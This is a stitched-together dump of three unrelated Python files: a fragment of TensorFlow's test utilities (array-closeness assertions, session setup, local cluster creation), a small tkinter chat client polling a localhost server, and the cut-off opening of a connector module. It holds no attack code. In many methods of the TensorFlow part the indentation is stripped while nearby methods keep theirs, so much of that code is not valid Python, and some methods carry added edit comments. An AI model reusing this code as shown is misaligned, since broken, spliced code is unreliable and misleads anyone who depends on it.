ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tensor(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
  def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
    """Asserts two array-likes have the same shape and element-wise close values.

    Args:
      a: the expected value, convertible via `_GetNdArray`.
      b: the actual value, convertible via `_GetNdArray`.
      rtol: relative tolerance.
      atol: absolute tolerance.
      msg: Optional message to report on failure.
    """
    a = self._GetNdArray(a)
    b = self._GetNdArray(b)
    # When the array rank is small, print its contents. Numpy array printing is
    # implemented using inefficient recursion so prints can cause tests to
    # time out.
    if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
      shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
                            "%s.") % (a.shape, b.shape, b)
    else:
      shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
                                                                     b.shape)
    self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
    msgs = [msg]
    if not np.allclose(a, b, rtol=rtol, atol=atol):
      # Adds more details to np.testing.assert_allclose.
      #
      # NOTE: numpy.allclose (and numpy.testing.assert_allclose)
      # checks whether two arrays are element-wise equal within a
      # tolerance. The relative difference (rtol * abs(b)) and the
      # absolute difference atol are added together to compare against
      # the absolute difference between a and b. Here, we want to
      # tell user which elements violate such conditions.
      cond = np.logical_or(
          np.abs(a - b) > atol + rtol * np.abs(b),
          np.isnan(a) != np.isnan(b))
      if a.ndim:
        x = a[np.where(cond)]
        y = b[np.where(cond)]
        msgs.append("not close where = {}".format(np.where(cond)))
      else:
        # np.where is broken for scalars
        x, y = a, b
      msgs.append("not close lhs = {}".format(x))
      msgs.append("not close rhs = {}".format(y))
      msgs.append("not close dif = {}".format(np.abs(x - y)))
      msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
      msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
      # TODO(xpan): There seems to be a bug:
      # tensorflow/compiler/tests:binary_ops_test pass with float32
      # nan even though the equal_nan is False by default internally.
      np.testing.assert_allclose(
          a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
  def _assertAllCloseRecursive(self,
                               a,
                               b,
                               rtol=1e-6,
                               atol=1e-6,
                               path=None,
                               msg=None):
    """Recursively asserts near-equality of two nested structures.

    Handles dicts, namedtuples (via `_asdict`), lists/tuples, and array-like
    leaves.  `path` accumulates the keys/indices leading to the current
    sub-structure so error messages can pinpoint the mismatching leaf.

    Args:
      a: the expected structure.
      b: the actual structure.
      rtol: relative tolerance.
      atol: absolute tolerance.
      path: internal; list of keys/indices to the current sub-structure.
      msg: Optional message to report on failure.

    Raises:
      ValueError: if the structures of `a` and `b` do not match (dict vs
        non-dict, or sequences of different length).
    """
    path = path or []
    path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
    msg = msg if msg else ""
    # Check if a and/or b are namedtuples.
    if hasattr(a, "_asdict"):
      a = a._asdict()
    if hasattr(b, "_asdict"):
      b = b._asdict()
    a_is_dict = isinstance(a, collections_abc.Mapping)
    if a_is_dict != isinstance(b, collections_abc.Mapping):
      raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
                       (path_str, path_str, msg))
    if a_is_dict:
      self.assertItemsEqual(
          a.keys(),
          b.keys(),
          msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
          (path_str, a.keys(), path_str, b.keys(), msg))
      for k in a:
        # path is mutated in place and restored after the recursive call.
        path.append(k)
        self._assertAllCloseRecursive(
            a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
        del path[-1]
    elif isinstance(a, (list, tuple)):
      # Try to directly compare a, b as ndarrays; if not work, then traverse
      # through the sequence, which is more expensive.
      try:
        a_as_ndarray = self._GetNdArray(a)
        b_as_ndarray = self._GetNdArray(b)
        self._assertArrayLikeAllClose(
            a_as_ndarray,
            b_as_ndarray,
            rtol=rtol,
            atol=atol,
            msg="Mismatched value: a%s is different from b%s. %s" %
            (path_str, path_str, msg))
      except (ValueError, TypeError) as e:
        if len(a) != len(b):
          raise ValueError(
              "Mismatched length: a%s has %d items, but b%s has %d items. %s" %
              (path_str, len(a), path_str, len(b), msg))
        for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
          path.append(str(idx))
          self._assertAllCloseRecursive(
              a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
          del path[-1]
    # a and b are ndarray like objects
    else:
      try:
        self._assertArrayLikeAllClose(
            a,
            b,
            rtol=rtol,
            atol=atol,
            msg=("Mismatched value: a%s is different from b%s. %s" %
                 (path_str, path_str, msg)))
      except TypeError as e:
        # Annotate the TypeError with the structural path before re-raising.
        msg = ("Error: a%s has %s, but b%s has %s. %s" %
               (path_str, type(a), path_str, type(b), msg))
        e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
        raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
  @py_func_if_in_function
  def assertAllEqual(self, a, b, msg=None):
    """Asserts that two numpy arrays or Tensors have the same values.

    Args:
      a: the expected numpy ndarray or anything can be converted to one.
      b: the actual numpy ndarray or anything can be converted to one.
      msg: Optional message to report on failure.
    """
    if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
      return self._assertRaggedEqual(a, b, msg)
    msg = msg if msg else ""
    a = self._GetNdArray(a)
    b = self._GetNdArray(b)
    # Arbitrary bounds so that we don't print giant tensors.
    if (b.ndim <= 3 or b.size < 500):
      self.assertEqual(
          a.shape, b.shape, "Shape mismatch: expected %s, got %s."
          " Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
    else:
      self.assertEqual(
          a.shape, b.shape, "Shape mismatch: expected %s, got %s."
          " %s" % (a.shape, b.shape, msg))
    same = (a == b)
    # For floating-point dtypes, treat NaN == NaN as equal.
    if (a.dtype in [
        np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
    ]):
      same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
    msgs = [msg]
    if not np.all(same):
      # Adds more details to np.testing.assert_array_equal.
      diff = np.logical_not(same)
      if a.ndim:
        x = a[np.where(diff)]
        y = b[np.where(diff)]
        msgs.append("not equal where = {}".format(np.where(diff)))
      else:
        # np.where is broken for scalars
        x, y = a, b
      msgs.append("not equal lhs = %r" % x)
      msgs.append("not equal rhs = %r" % y)
      # Handle mixed string types as a result of PY2to3 migration. That is, the
      # mixing between bytes (b-prefix strings, PY2 default) and unicodes
      # (u-prefix strings, PY3 default).
      if six.PY3:
        if (a.dtype.kind != b.dtype.kind and
            {a.dtype.kind, b.dtype.kind}.issubset({"U", "S", "O"})):
          a_list = []
          b_list = []
          # OK to flatten `a` and `b` because they are guaranteed to have the
          # same shape.
          for out_list, flat_arr in [(a_list, a.flat), (b_list, b.flat)]:
            for item in flat_arr:
              if isinstance(item, str):
                out_list.append(item.encode("utf-8"))
              else:
                out_list.append(item)
          a = np.array(a_list)
          b = np.array(b_list)
      np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
  @py_func_if_in_function
  def assertAllInRange(self,
                       target,
                       lower_bound,
                       upper_bound,
                       open_lower_bound=False,
                       open_upper_bound=False):
    """Assert that elements in a Tensor are all in a given range.

    Args:
      target: The numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor).
      lower_bound: lower bound of the range
      upper_bound: upper bound of the range
      open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
        than the default >=)
      open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
        than the default <=)

    Raises:
      AssertionError:
        if the value tensor does not have an ordered numeric type (float* or
        int*), or
        if there are nan values, or
        if any of the elements do not fall in the specified range.
    """
    target = self._GetNdArray(target)
    # Only ordered numeric dtypes (float*, int*) support the comparisons below.
    if not (np.issubdtype(target.dtype, np.floating) or
            np.issubdtype(target.dtype, np.integer)):
      raise AssertionError(
          "The value of %s does not have an ordered numeric type, instead it "
          "has type: %s" % (target, target.dtype))
    # NaN compares false against any bound, so it must be rejected explicitly
    # before the range check (otherwise NaNs would silently pass).
    nan_subscripts = np.where(np.isnan(target))
    if np.size(nan_subscripts):
      raise AssertionError(
          "%d of the %d element(s) are NaN. "
          "Subscripts(s) and value(s) of the NaN element(s):\n" %
          (len(nan_subscripts[0]), np.size(target)) +
          "\n".join(self._format_subscripts(nan_subscripts, target)))
    # Interval notation used in the failure message, e.g. "[0, 1)".
    range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
                 str(upper_bound) + (")" if open_upper_bound else "]"))
    # An element violates an open lower bound when <=, a closed one when <;
    # symmetrically for the upper bound below.
    violations = (
        np.less_equal(target, lower_bound) if open_lower_bound else np.less(
            target, lower_bound))
    violations = np.logical_or(
        violations,
        np.greater_equal(target, upper_bound)
        if open_upper_bound else np.greater(target, upper_bound))
    violation_subscripts = np.where(violations)
    if np.size(violation_subscripts):
      raise AssertionError(
          "%d of the %d element(s) are outside the range %s. " %
          (len(violation_subscripts[0]), np.size(target), range_str) +
          "Subscript(s) and value(s) of the offending elements:\n" +
          "\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
  # pylint: disable=g-doc-return-or-yield
  @contextlib.contextmanager
  def assertRaisesWithPredicateMatch(self, exception_type,
                                     expected_err_re_or_predicate):
    """Returns a context manager to enclose code expected to raise an exception.

    If the exception is an OpError, the op stack is also included in the message
    predicate search.

    Args:
      exception_type: The expected type of exception that should be raised.
      expected_err_re_or_predicate: If this is callable, it should be a function
        of one argument that inspects the passed-in exception and returns True
        (success) or False (please fail the test). Otherwise, the error message
        is expected to match this regular expression partially.

    Returns:
      A context manager to surround code that is expected to raise an
      exception.
    """
    if callable(expected_err_re_or_predicate):
      predicate = expected_err_re_or_predicate
    else:

      def predicate(e):
        # NOTE(review): `e.message` is a Python 2 exception attribute; on
        # Python 3 this relies on OpError defining `message` itself — confirm.
        err_str = e.message if isinstance(e, errors.OpError) else str(e)
        op = e.op if isinstance(e, errors.OpError) else None
        # Walk the chain of original ops so the regex can also match against
        # ops the failing op was derived from.
        while op is not None:
          err_str += "\nCaused by: " + op.name
          op = op._original_op  # pylint: disable=protected-access
        logging.info("Searching within error strings: '%s' within '%s'",
                     expected_err_re_or_predicate, err_str)
        return re.search(expected_err_re_or_predicate, err_str)

    try:
      yield
      # Reaching here means the enclosed block did not raise at all.
      self.fail(exception_type.__name__ + " not raised")
    except Exception as e:  # pylint: disable=broad-except
      # Fail on wrong exception type OR non-matching message/predicate.
      if not isinstance(e, exception_type) or not predicate(e):
        raise AssertionError("Exception of type %s: %s" %
                             (str(type(e)), str(e)))

  # pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
  def _GetPyList(self, a):
    """Converts `a` to a nested python list.

    Args:
      a: A `RaggedTensor`, `Tensor`, ndarray, `RaggedTensorValue`, or anything
        `np.array` can consume (list, tuple, scalar, ...).

    Returns:
      A (possibly nested) plain Python list mirroring the values of `a`.
    """
    # Order of the isinstance checks matters: ragged tensors are handled
    # before dense tensors because evaluating them yields a
    # RaggedTensorValue, not an ndarray.
    if isinstance(a, ragged_tensor.RaggedTensor):
      return self.evaluate(a).to_list()
    elif isinstance(a, ops.Tensor):
      a = self.evaluate(a)
      # evaluate() may already return a python value rather than an ndarray.
      return a.tolist() if isinstance(a, np.ndarray) else a
    elif isinstance(a, np.ndarray):
      return a.tolist()
    elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
      return a.to_list()
    else:
      # Fall back to numpy to normalize lists/tuples/scalars uniformly.
      return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
  # Fix Python 3+ compatibility issues: unittest renamed these methods, so
  # alias the Python 3 names under the old Python 2 spellings that existing
  # tests still call.
  if not six.PY2:
    # pylint: disable=invalid-name
    # Silence a deprecation warning
    assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
    # assertItemsEqual is assertCountEqual as of 3.2.
    assertItemsEqual = googletest.TestCase.assertCountEqual
    # pylint: enable=invalid-name
  @contextlib.contextmanager
  def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
    """Set the session and its graph to global default and constrain devices.

    Args:
      sess: The session to install as default (ignored in eager mode).
      use_gpu: If True, yield the session without any device constraint.
      force_gpu: If True, pin the graph to a GPU device explicitly.

    Yields:
      The session, or None when executing eagerly.
    """
    if context.executing_eagerly():
      # Eager mode has no graph or session to constrain.
      yield None
    else:
      with sess.graph.as_default(), sess.as_default():
        if force_gpu:
          # Use the name of an actual device if one is detected, or
          # '/device:GPU:0' otherwise
          gpu_name = gpu_device_name()
          if not gpu_name:
            gpu_name = "/device:GPU:0"
          with sess.graph.device(gpu_name):
            yield sess
        elif use_gpu:
          # No device constraint: placement is left to the runtime.
          yield sess
        else:
          # Explicitly pin to CPU so GPU kernels are never selected.
          with sess.graph.device("/device:CPU:0"):
            yield sess
  def _create_session(self, graph, config, force_gpu):
    """See session() for details.

    Args:
      graph: The graph to attach the new session to (may be None).
      config: An optional config_pb2.ConfigProto for the session.
      force_gpu: If True, soft placement is disabled so GPU placement is
        enforced.

    Returns:
      An ErrorLoggingSession wrapping the prepared config.
    """

    def prepare_config(config):
      """Returns a config for sessions.

      Args:
        config: An optional config_pb2.ConfigProto to use to configure the
          session.

      Returns:
        A config_pb2.ConfigProto object.
      """
      # TODO(b/114333779): Enforce allow_soft_placement=False when
      # use_gpu=False. Currently many tests rely on the fact that any device
      # will be used even when a specific device is supposed to be used.
      allow_soft_placement = not force_gpu
      if config is None:
        config = context.context().config
        config.allow_soft_placement = allow_soft_placement
      elif not allow_soft_placement and config.allow_soft_placement:
        # Caller-supplied config conflicts with force_gpu: start from the
        # context's config and turn soft placement off.
        config_copy = context.context().config
        config = config_copy
        config.allow_soft_placement = False
      # Don't perform optimizations for tests so we don't inadvertently run
      # gpu ops on cpu
      config.graph_options.optimizer_options.opt_level = -1
      # Disable Grappler constant folding since some tests & benchmarks
      # use constant input and become meaningless after constant folding.
      # DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
      # GRAPPLER TEAM.
      config.graph_options.rewrite_options.constant_folding = (
          rewriter_config_pb2.RewriterConfig.OFF)
      config.graph_options.rewrite_options.pin_to_host_optimization = (
          rewriter_config_pb2.RewriterConfig.OFF)
      return config

    return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
                         num_ps,
                         protocol="grpc",
                         worker_config=None,
                         ps_config=None):
  """Create and start local servers and return the associated `Server` objects.

  "PS" stands for "parameter server": a task responsible for storing and
  updating the model's parameters. Other tasks send updates to these parameters
  as they work on optimizing the parameters. This particular division of labor
  between tasks is not required, but is common for distributed training.

  Read more at https://www.tensorflow.org/guide/extend/architecture

  Example:

  ```python
  workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)

  worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]

  with tf.device("/job:ps/task:0"):
    ...
  with tf.device("/job:ps/task:1"):
    ...
  with tf.device("/job:worker/task:0"):
    ...
  with tf.device("/job:worker/task:1"):
    ...

  worker_sessions[0].run(...)
  ```

  Args:
    num_workers: Number of worker servers to start.
    num_ps: Number of PS servers to start.
    protocol: Communication protocol. Allowed values are documented in the
      documentation of `tf.distribute.Server`.
    worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
      used to instantiate multiple devices etc.
    ps_config: (optional) `tf.ConfigProto` to initialize PS servers.

  Returns:
    A tuple `(worker_servers, ps_servers)`.  `worker_servers` is a list
    of `num_workers` objects of type `tf.distribute.Server` (all running
    locally); and `ps_servers` is a list of `num_ps` objects of similar type.

  Raises:
    ImportError: if portpicker module was not found at load time
  """
  import portpicker  # pylint: disable=g-import-not-at-top

  # Reserve a free localhost port for every task and describe the cluster.
  worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
  ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
  cluster_spec = server_lib.ClusterSpec({
      "worker": ["localhost:%s" % port for port in worker_ports],
      "ps": ["localhost:%s" % port for port in ps_ports],
  })

  def _start_servers(job_name, count, config):
    # One started `Server` per task index of the given job.
    return [
        server_lib.Server(
            cluster_spec,
            job_name=job_name,
            protocol=protocol,
            task_index=task_index,
            config=config,
            start=True) for task_index in range(count)
    ]

  workers = _start_servers("worker", num_workers, worker_config)
  ps_servers = _start_servers("ps", num_ps, ps_config)
  return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
  """Returns the `NodeDef` instance for given node name in the graph def.

  This method explores only the NodeDefs in `graph_def.node`.

  Args:
    node_name: Name of the NodeDef to search for.
    graph_def: An instance of `GraphDef` proto.

  Returns:
    the `NodeDef` instance whose name field matches the given node_name or None.
  """
  # First match wins; `next` with a default avoids the explicit loop.
  return next(
      (node_def for node_def in graph_def.node if node_def.name == node_name),
      None)
def set_producer_version(graph, producer_version):
  """Sets graph.graph_def_versions.producer to `producer_version`.

  Args:
    graph: The graph whose producer version is to be changed.
    producer_version: The desired GraphDef producer version.
  """
  # The C API doesn't expose altering GraphDefVersions. We can indirectly set
  # it via import_graph_def though.
  graph_def = graph_pb2.GraphDef()
  graph_def.versions.producer = producer_version
  with graph.as_default():
    importer.import_graph_def(graph_def)
  # Bug fix: the original `assert x, y` form used `producer_version` as the
  # assertion *message*, so the equality was never actually verified.
  assert graph.graph_def_versions.producer == producer_version
|
client.py | from tkinter import *
import requests
import threading
import time
# Build the main window and the static widgets of the chat UI.
root = Tk()
root.title("DSS Chat System")
name_label = Label(text="Name : ")  # caption for the name entry
usr_name_entry = Entry()            # where the user types their name
message_field = Text()              # displays the full message transcript
message_input = Entry()             # where the user types a new message
def threadStart():
    """Start the background poller that keeps the message view up to date."""
    # Bug fix: `getMessages` loops forever, so the thread must be a daemon;
    # otherwise a non-daemon thread keeps the process alive after the Tk
    # window is closed.
    thread1 = threading.Thread(target=getMessages, daemon=True)
    thread1.start()
def getMessages():
    """Poll the chat server once a second and refresh the message view.

    Runs forever; intended to be executed on a background thread.
    """
    while True:
        try:
            response = requests.get("http://localhost:8000/show")
            final_message = ""
            for item in response.json():
                name = item["name"]
                mes = item["message"]
                final_message += f"{name} : {mes}\n"
            # Only clear the widget once we have a fresh transcript; the old
            # code cleared it *before* fetching, so a failure left it blank.
            message_field.delete(1.0, "end")
            message_field.insert(1.0, final_message)
        except (requests.RequestException, ValueError, KeyError):
            # Bug fix: a network error or malformed JSON used to raise out of
            # this loop and silently kill the poller thread. Keep the old
            # contents and retry on the next tick instead.
            pass
        time.sleep(1)
def sendMessage():
    """Send the current name/message pair to the chat server and clear input."""
    name = usr_name_entry.get()
    message = message_input.get()
    # Bug fix: the query string was built by f-string concatenation, which
    # breaks on spaces, '&', '#', '=' etc. in the message. Let `requests`
    # URL-encode the values instead.
    requests.get("http://localhost:8000", params={"name": name, "message": message})
    message_input.delete(0, 'end')
# Buttons wired to the handlers defined above.
submit_button = Button(text="Submit", command=sendMessage)
start_but = Button(text="Start", command=threadStart)
# Grid layout: row 0 = name entry + start button, row 1 = transcript,
# row 2 = message input + submit button.
name_label.grid(row=0, column=0)
usr_name_entry.grid(row=0, column=1)
start_but.grid(row=0, column=2)
message_field.grid(row=1, column=0, columnspan=2)
message_input.grid(row=2, column=0, columnspan=2)
submit_button.grid(row=2, column=1)
# Blocks until the window is closed.
root.mainloop()
|
Connector.py | """
Created on Okt 29 13:15 2019
@author: nishit
"""
import json
import threading
import time
from connector.apiConnectorFactory import ApiConnectorFactory
from connector.equationConnector import EquationConnector
from connector.equationParser import EquationParser
from connector.parserConnector import ParserConnector
from utils_intern.messageLogger import MessageLogger
logger = MessageLogger.get_logger_parent()
class Connector:
    """Starts data connectors for all configured houses and equations.

    For every `HOUSE*` section in the config a connector-creation thread is
    started; after a grace period, one thread per parsed equation is started
